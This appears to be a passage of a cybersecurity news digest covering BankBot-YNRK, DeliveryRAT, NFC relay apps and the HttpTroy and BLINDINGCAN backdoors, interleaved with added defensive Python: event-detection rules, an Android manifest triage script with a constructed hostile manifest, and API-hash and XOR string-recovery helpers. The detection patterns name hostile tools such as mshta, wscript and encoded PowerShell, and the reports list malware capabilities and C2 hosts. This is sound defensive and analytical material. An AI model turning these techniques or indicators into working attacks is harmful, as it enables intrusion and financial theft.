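RUN_DIALOG_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "discord.exe"}   # allowlist, tune per estate
DISCORD_DOMAINS = ("discord.com", "discordapp.com", "discord.gg")
SCRIPT_PATH = re.compile(r'([A-Za-z]:)\\[^"\s]*\.(?:vbs|vbe|js|jse|wsf)\b', re.I)
CLICKFIX_HINTS = re.compile(r"https?://|wscript|mshta|\biwr\b|invoke-webrequest|-enc", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def script_drive(cmdline: str):
    """Drive letter of the first script file referenced on the command line, or None."""
    m = SCRIPT_PATH.search(cmdline)
    return m.group(1).upper() if m else None


def wscript_from_removable_drive(e):          # Tangerine Turkey initial access
    return (e["id"] == 1 and basename(e["image"]) in SCRIPT_HOSTS
            and script_drive(e["cmdline"]) in REMOVABLE_DRIVES)


def printui_spawned_by_script_host(e):        # LOLBin chained from the VBS
    return (e["id"] == 1 and basename(e["image"]) == "printui.exe"
            and basename(e["parent"]) in SCRIPT_HOSTS)


def run_key_persistence(e):                   # registry-based persistence
    return e["id"] == 13 and re.search(r"\\CurrentVersion\\Run(?:Once)?\\", e["target"], re.I) is not None


def clickfix_run_dialog(e):                   # pasted command: explorer.exe is the parent
    return (e["id"] == 1 and basename(e["parent"]) == "explorer.exe"
            and basename(e["image"]) in RUN_DIALOG_CHILDREN
            and CLICKFIX_HINTS.search(e["cmdline"]) is not None)


def discord_dns_from_non_browser(e):          # Discord used as C2 by an unexpected process
    return (e["id"] == 22 and e["query"].lower().endswith(DISCORD_DOMAINS)
            and basename(e["image"]) not in BROWSERS)


RULES = {f.__name__: f for f in (wscript_from_removable_drive, printui_spawned_by_script_host,
                                 run_key_persistence, clickfix_run_dialog,
                                 discord_dns_from_non_browser)}


def triage(events):
    """Map rule name -> indices of the events that matched it (only rules that fired)."""
    hits = defaultdict(list)
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                hits[name].append(i)
    return dict(hits)


if __name__ == "__main__":
    for name, idx in triage(EVENTS).items():
        print(f"{name}: events {idx}")
```

    The Run-dialog rule needs the command-line keyword filter, otherwise ordinary `cmd.exe /c dir` from the Start menu fires too; the Discord rule needs an allowlist that reflects whether a legitimate Discord client is deployed in your environment.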
    • MITRE Releases ATT&CK v18 — The MITRE Corporation has released an updated version of the ATT&CK (v18) framework, which updates detections with two new objects: Detection Strategies for detecting specific attacker techniques and Analytics that provide platform-specific threat detection logic. “On the Mobile front, there’s coverage of state-sponsored abuse of Signal/WhatsApp-linked devices and enhanced account collection techniques,” MITRE said. “And in ICS, new and updated Asset objects expand the range of industrial equipment and attack scenarios ATT&CK can represent, including improved connections across sector-specific terminology through Related Assets.”

    🎥 Cybersecurity Webinars

    • Stop Drowning in Vulnerability Lists: Discover Dynamic Attack Surface Reduction — Tired of too many security problems and not enough time to fix them? Join The Hacker News and Bitdefender to learn about Dynamic Attack Surface Reduction (DASR)—a new way to quickly close security gaps using smart tools and automation. See how Bitdefender PHASR helps teams stay safe, reduce risk, and block threats before they cause harm.
    • Securing Cloud Infrastructure: Strategies to Balance Agility, Compliance, and Security — As more companies move to the cloud, keeping data and access safe becomes harder. In this webinar, experts will share easy-to-follow tips to protect cloud systems, manage user access, and stay on top of global rules—all without slowing down your business. You’ll learn real steps you can take right away to keep your cloud secure and your team moving fast.

    🔧 Cybersecurity Tools

    • runZeroHound — A new handy open‑source toolkit from runZero that turns your asset data into visual “attack graphs” so you can see exactly how threats could move through your network. With this in hand, you’ll spot dangerous paths, close the gaps faster, and stay ahead of what attackers might try next.
    • DroidRun — It is a security testing tool that helps researchers and analysts safely run and monitor Android malware in a sandboxed environment. It’s designed to make it easier to observe how malicious apps behave without risking your system. Perfect for dynamic analysis, it supports automation and gives detailed insights into malware activity.

    Disclaimer: These tools are for educational and research use only. They haven’t been fully security-tested and could pose risks if used incorrectly. Review the code before trying them, test only in safe environments, and follow all ethical, legal, and organizational rules.

    🔒 Tip of the Week

    Why Attack Surface Reduction Matters More Than Ever — What if your biggest risk isn’t a new zero-day—but something already sitting quietly inside your system?

    This week, the spotlight turns to Attack Surface Reduction (ASR)—a strategy that’s fast becoming a must-have, not a nice-to-have. As companies spin up more cloud apps, APIs, and accounts, hackers are finding easy ways in through what’s already exposed. Think forgotten subdomains, unused ports, old user accounts. The more you have, the more they have to work with.

    The good news? Open-source tools are stepping up. EasyEASM helps map what’s live on the web. Microsoft’s Attack Surface Analyzer shows what changes after updates or installs. ASRGEN lets you test smart rules in Windows Defender to shut down risky behaviors before they’re exploited.

    Here’s the truth: you don’t have to stop building fast—you just have to build smart. Shrinking your attack surface doesn’t slow innovation. It protects it.

    Don’t wait for an alert. Take control before attackers do. Map it. Cut it. Lock it down.

    Conclusion

    The big lesson this week? Cyber threats don’t always look like threats. They can hide in normal apps, trusted websites, or even job offers. It’s no longer just about stopping viruses—it’s about spotting tricks, acting fast, and thinking ahead. Every click, update, and login matters.

    Cybersecurity isn’t a one-time fix. It’s an everyday habit.


    Source: thehackernews.com…

  • Researchers Uncover BankBot-YNRK and DeliveryRAT Android Trojans Stealing Financial Data


    Android

    Cybersecurity researchers have shed light on two different Android trojans called BankBot-YNRK and DeliveryRAT that are capable of harvesting sensitive data from compromised devices.

    According to CYFIRMA, which analyzed three different samples of BankBot-YNRK, the malware incorporates features to sidestep analysis: it first checks whether it is running within a virtualized or emulated environment, and then extracts device details such as the manufacturer and model name to ascertain whether it is being executed on a real device.

    BankBot-YNRK also checks if the device is manufactured by Oppo, or is running on ColorOS, a version of the Android operating system that’s used on devices made by the Chinese original equipment manufacturer (OEM).

    “The malware also includes logic to identify specific devices,” CYFIRMA said. “It verifies whether the device is a Google Pixel or a Samsung device and checks if its model is included in a predefined list of recognized or supported models. This allows the malware to apply device-specific functionality or optimizations only on targeted devices while avoiding execution on unrecognized models.”

    The names of the APK packages distributing the malware are listed below. All three apps go by the name “IdentitasKependudukanDigital.apk,” which appears to be an attempt to impersonate the legitimate Indonesian government app “Identitas Kependudukan Digital.”

    • com.westpacb4a.payqingynrk1b4a
    • com.westpacf78.payqingynrk1f78
    • com.westpac91a.payqingynrk191a

    Once installed, the malicious apps are designed to harvest device information and set the volume of various audio streams, such as music, ringtone, and notifications, to zero to prevent the affected victim from being alerted to incoming calls, messages, and other in-app notifications.


    It also establishes communication with a remote server (“ping.ynrkone[.]top”) and, upon receiving the “OPEN_ACCESSIBILITY” command, urges the user to enable accessibility services, which it then abuses to gain elevated privileges and carry out malicious actions.

    The malware, however, is capable of targeting only Android devices running version 13 and below, as Android 14, launched in late 2023, introduced a security feature that prevents accessibility services from being used to automatically request or grant an app additional permissions.

    “Until Android 13, apps could bypass permission requests through accessibility features; however, with Android 14, this behavior is no longer possible, and users must grant permissions directly through the system interface,” CYFIRMA said.

    BankBot-YNRK leverages Android’s JobScheduler service to establish persistence on the device and ensure it’s launched after a reboot. It also supports a wide range of commands to gain device administrator privileges, manage apps, interact with the device, redirect incoming calls using MMI codes, take photos, perform file operations, and harvest contacts, SMS messages, locations, lists of installed apps, and clipboard content.

    Some of the other features of the malware are as follows –

    • Impersonating Google News by programmatically replacing the app’s name and icon, as well as launching “news.google[.]com” via a WebView
    • Capturing screen content to reconstruct a “skeleton UI” of application screens, such as banking apps, to facilitate credential theft
    • Abusing accessibility services to open cryptocurrency wallet apps from a predefined list and automating UI actions to gather sensitive data and initiate unauthorized transactions
    • Retrieving a list of 62 financial apps to target
    • Displaying an overlay message claiming the user’s personal information is being verified while the malicious actions are carried out, including requesting extra permissions for itself and adding itself as a device administrator app

    “BankBot-YNRK exhibits a comprehensive feature set aimed at maintaining long-term access, stealing financial data, and executing fraudulent transactions on compromised Android devices,” CYFIRMA said.

    The disclosure comes as F6 revealed that threat actors are distributing an updated version of DeliveryRAT targeting Russian Android device owners under the guise of food delivery services, marketplaces, banking services, as well as parcel tracking applications. The mobile threat is assessed to be active since mid-2024.

    According to the Russian cybersecurity company, the malware is advertised under a malware-as-a-service (MaaS) model through a Telegram bot named Bonvi Team, allowing users to either get access to an APK file or links to phishing pages distributing the malware.

    Victims are then approached on messaging apps like Telegram, where they are asked to download the malicious app as part of tracking orders from fake marketplaces or for a remote employment opportunity. Regardless of the method used, the app requests access to notifications and battery optimization settings so that it can gather sensitive data and run in the background without being terminated.


    Furthermore, the rogue apps come with capabilities to access SMS messages and call logs, and hide their own icons from the home screen launcher, thereby making it difficult for a less tech-savvy user to remove them from the device.

    Some iterations of DeliveryRAT are also equipped to conduct distributed denial-of-service (DDoS) attacks by making simultaneous requests to a URL transmitted from the external server, and to launch activities that capture data, including by tricking the user into scanning a QR code.

    The discovery of the two Android malware families coincides with a report from Zimperium, which discovered more than 760 Android apps since April 2024 that misuse near-field communication (NFC) to illegally obtain payment data and send it to a remote attacker.

    These fake apps, masquerading as financial applications, prompt users to set them as their default payment method, while taking advantage of Android’s host-based card emulation (HCE) to steal contactless credit card and payment data.

    The information is relayed either to a Telegram channel or a dedicated tapper app operated by the threat actors. The stolen NFC data is then used to withdraw funds from a user’s accounts or make purchases at point-of-sale (PoS) terminals almost instantly.

    “Approximately 20 institutions have been impersonated – primarily Russian banks and financial services, but also target organizations in Brazil, Poland, the Czech Republic, and Slovakia,” the mobile security company said.
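    The three families above share a recognisable manifest footprint: BankBot-YNRK binds an accessibility service and a device-admin receiver and draws overlays, DeliveryRAT asks for notification access, battery-optimization exemption, SMS and call logs, and the NFC relay apps declare a HostApduService. A decoded AndroidManifest.xml (as produced by apktool, an assumption about your tooling) is enough to flag all of that before dynamic analysis. The triage function below is an added example written for this article, not code from CYFIRMA, F6 or Zimperium. The hostile manifest is constructed to exercise every rule at once and is not a real sample; the only page-sourced data is the three BankBot-YNRK package names, and the flag weights and the verdict threshold are assumptions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"   # the android: attribute namespace

# Package names listed in the write-up for BankBot-YNRK.
KNOWN_BAD_PACKAGES = {
    "com.westpacb4a.payqingynrk1b4a",
    "com.westpacf78.payqingynrk1f78",
    "com.westpac91a.payqingynrk191a",
}

# <uses-permission> names -> (flag, weight). Weights are an assumption.
PERMISSION_FLAGS = {
    "android.permission.SYSTEM_ALERT_WINDOW": ("overlay", 2),
    "android.permission.READ_SMS": ("sms_access", 2),
    "android.permission.RECEIVE_SMS": ("sms_access", 2),
    "android.permission.READ_CALL_LOG": ("call_log_access", 1),
    "android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS": ("battery_optimization_bypass", 1),
}
# android:permission values on components that bind to privileged system services.
COMPONENT_FLAGS = {
    "android.permission.BIND_ACCESSIBILITY_SERVICE": ("accessibility_service", 3),
    "android.permission.BIND_DEVICE_ADMIN": ("device_admin", 3),
    "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE": ("notification_listener", 2),
}
HCE_ACTION = "android.nfc.cardemulation.action.HOST_APDU_SERVICE"   # host-based card emulation


def triage_manifest(xml_text: str) -> dict:
    """Static triage of a decoded manifest: flags, additive score, IOC match, verdict."""
    root = ET.fromstring(xml_text)
    flags = {}   # flag -> weight; a flag counts once however often it appears
    for perm in root.iter("uses-permission"):
        hit = PERMISSION_FLAGS.get(perm.get(A + "name"))
        if hit:
            flags[hit[0]] = hit[1]
    for comp in root.iter():
        if comp.tag not in ("service", "receiver", "activity"):
            continue
        hit = COMPONENT_FLAGS.get(comp.get(A + "permission"))
        if hit:
            flags[hit[0]] = hit[1]
        if comp.tag == "service" and any(act.get(A + "name") == HCE_ACTION
                                         for act in comp.iter("action")):
            flags["hce_service"] = 3
    package = root.get("package", "")
    score = sum(flags.values())
    known_bad = package in KNOWN_BAD_PACKAGES
    if known_bad or score >= 6:          # threshold is an assumption; tune on your corpus
        verdict = "malicious_indicators"
    elif score:
        verdict = "review"
    else:
        verdict = "clean"
    app = root.find("application")
    return {"package": package,
            "label": app.get(A + "label", "") if app is not None else "",
            "flags": sorted(flags), "score": score,
            "known_bad": known_bad, "verdict": verdict}


# Constructed manifest combining the traits of all three families; not a real sample.
HOSTILE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.westpacb4a.payqingynrk1b4a">
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
  <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
  <uses-permission android:name="android.permission.NFC"/>
  <application android:label="Identitas Kependudukan Digital">
    <service android:name=".AccService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
    <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
    <service android:name=".NotifService" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"/>
    <service android:name=".HceService" android:permission="android.permission.BIND_NFC_SERVICE" android:exported="true">
      <intent-filter><action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/></intent-filter>
    </service>
  </application>
</manifest>
"""

# Constructed benign manifest for comparison.
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for m in (HOSTILE_MANIFEST, BENIGN_MANIFEST):
        print(triage_manifest(m))
```

    A legitimate payment app will also declare a HostApduService, and a screen reader will bind an accessibility service, so the score is a prioritisation aid rather than a verdict on its own; the combination of overlay plus accessibility plus device admin in an app impersonating a government or banking label is what should move a sample to the front of the queue.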


    Source: thehackernews.com…

  • New HttpTroy Backdoor Poses as VPN Invoice in Targeted Cyberattack on South Korea


    Nov 03, 2025 | Ravie Lakshmanan | Cybersecurity / Malware

    The North Korea-linked threat actor known as Kimsuky has distributed a previously undocumented backdoor codenamed HttpTroy as part of a likely spear-phishing attack targeting a single victim in South Korea.

    Gen Digital, which disclosed details of the activity, did not reveal any details on when the incident occurred, but noted that the phishing email contained a ZIP file (“250908_A_HK이노션_SecuwaySSL VPN Manager U100S 100user_견적서.zip”), which masqueraded as a VPN invoice to distribute malware capable of file transfer, capturing screenshots, and executing arbitrary commands.

    “The chain has three steps: a small dropper, a loader called MemLoad, and the final backdoor, named ‘HttpTroy,’” security researcher Alexandru-Cristian Bardaș said.

    The ZIP archive contains an SCR file of the same name; opening it triggers the execution chain, starting with a Golang binary that carries three embedded files, including a decoy PDF document that is displayed to the victim to avoid raising suspicion.


    Launched simultaneously in the background is MemLoad, which is responsible for setting up persistence on the host by means of a scheduled task named “AhnlabUpdate,” an attempt to impersonate AhnLab, a South Korean cybersecurity company, and for decrypting and executing the DLL backdoor (“HttpTroy”).

    The implant allows the attackers to gain complete control over the compromised system, enabling file upload/download, screenshot capture, command execution with elevated privileges, in-memory loading of executables, reverse shell, process termination, and trace removal. It communicates with the command-and-control (C2) server (“load.auraria[.]org”) over HTTP POST requests.

    “HttpTroy employs multiple layers of obfuscation to hinder analysis and detection,” Bardaș explained. “API calls are concealed using custom hashing techniques, while strings are obfuscated through a combination of XOR operations and SIMD instructions. Notably, the backdoor avoids reusing API hashes and strings. Instead, it dynamically reconstructs them during runtime using varied combinations of arithmetic and logical operations, further complicating static analysis.”
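    Hashed API names and XOR-obfuscated strings of the kind described above are defeated the same way in every sample: precompute the hash of every export the binary could plausibly resolve and look observed hashes up, and brute-force the XOR key by scoring candidate plaintexts. The code below is an added example written for this article, not Gen Digital’s analysis tooling and not HttpTroy’s own routine. The page says the hashing is custom, so the ROR13 rolling hash here is the classic shellcode hash used only as a stand-in; the export list is a constructed subset (in practice you would hash every export of the DLLs the sample loads), and the encoded blob is the C2 hostname quoted above XORed with an invented single-byte key.

```python
import string

LIKELY_CHARS = set(string.ascii_lowercase + string.digits + ".")   # what a C2 hostname looks like


def ror13_hash(name: str) -> int:
    """Rotate-right-13 rolling hash over an export name's ASCII bytes (stand-in for a custom hash)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + b) & 0xFFFFFFFF
    return h


# Constructed subset of exports a backdoor with the listed capabilities would need.
EXPORT_NAMES = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect", "CreateThread",
    "CreateProcessW", "TerminateProcess", "DeleteFileW", "ReadFile", "WriteFile",
    "WinHttpOpen", "WinHttpConnect", "WinHttpSendRequest", "WinHttpReceiveResponse",
    "BitBlt", "GetDC",
]


def build_hash_table(names, hashfn=ror13_hash):
    """hash -> export name, so hashes pulled from the sample resolve to names."""
    return {hashfn(n): n for n in names}


def resolve_hashes(hashes, table):
    return [table.get(h, f"unresolved_{h:08x}") for h in hashes]


def xor_bytes(buf: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; a key of length 1 is the single-byte case."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(buf))


def _plausibility(buf: bytes) -> int:
    # Reward hostname-like characters, tolerate other printable ASCII, punish the rest.
    score = 0
    for b in buf:
        if chr(b) in LIKELY_CHARS:
            score += 2
        elif 0x20 <= b < 0x7F:
            score += 1
        else:
            score -= 5
    return score


def guess_single_byte_key(buf: bytes) -> int:
    """Key whose decryption scores highest; ties go to the lowest key value."""
    return max(range(256), key=lambda k: _plausibility(xor_bytes(buf, bytes([k]))))


def recover_string(buf: bytes):
    key = guess_single_byte_key(buf)
    return key, xor_bytes(buf, bytes([key])).decode("latin-1")


# Constructed blob: the C2 hostname from the write-up XORed with 0x5A (key is invented).
ENC_SAMPLE = bytes.fromhex("36353b3e743b2f283b28333b7435283d")

if __name__ == "__main__":
    table = build_hash_table(EXPORT_NAMES)
    print(resolve_hashes([ror13_hash("WinHttpSendRequest"), 0x12345678], table))
    print(recover_string(ENC_SAMPLE))
```

    Because HttpTroy reportedly never reuses a hash or string constant and rebuilds them arithmetically at runtime, the hashes to feed `resolve_hashes` come from an emulator or debugger breakpoint on the resolver rather than from a static scan; the lookup table itself is the same either way.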

    The findings come as the cybersecurity vendor also detailed a Lazarus Group attack that led to the deployment of Comebacker and an upgraded version of its BLINDINGCAN (aka AIRDRY or ZetaNile) remote access trojan. The attack targeted two victims in Canada and was detected in the “middle of the attack chain,” it added.

    While the exact initial access vector used in the attack is not known, it’s assessed to be a phishing email based on the absence of any known security vulnerabilities that could have been exploited to gain a foothold.

    Two different variants of Comebacker – one as a DLL and another as an EXE – have been put to use, with the former launched via a Windows service and the latter through “cmd.exe.” Irrespective of the method used to execute them, the end goal of the malware is the same: to decrypt an embedded payload (i.e., BLINDINGCAN) and deploy it as a service.


    BLINDINGCAN is designed to establish a connection with a remote C2 server (“tronracing[.]com”) and await further instructions that allow it to –

    • Upload/download files
    • Delete files
    • Alter a file’s attributes to mimic another file
    • Recursively enumerate all files and sub-directories for a specified path
    • Gather data about files across the entire file system
    • Collect system metadata
    • List running processes
    • Run a command-line using CreateProcessW
    • Execute binaries directly in memory
    • Execute commands using “cmd.exe”
    • Terminate a specific process by passing a process ID as input
    • Take screenshots
    • Take pictures from the available video capture devices
    • Update configuration
    • Change current working directory
    • Delete itself and remove all traces of malicious activity

    “Kimsuky and Lazarus continue to sharpen their tools, showing that DPRK-linked actors aren’t just maintaining their arsenals, they’re reinventing them,” Gen Digital said. “These campaigns demonstrate a well-structured and multi-stage infection chain, leveraging obfuscated payloads and stealthy persistence mechanisms.”

    “From the initial stages to the final backdoors, each component is designed to evade detection, maintain access and provide extensive control over the compromised system. The use of custom encryption, dynamic API resolution and COM-based task registration/services exploitation highlights the groups’ continued evolution and technical sophistication.”


    Source: thehackernews.com…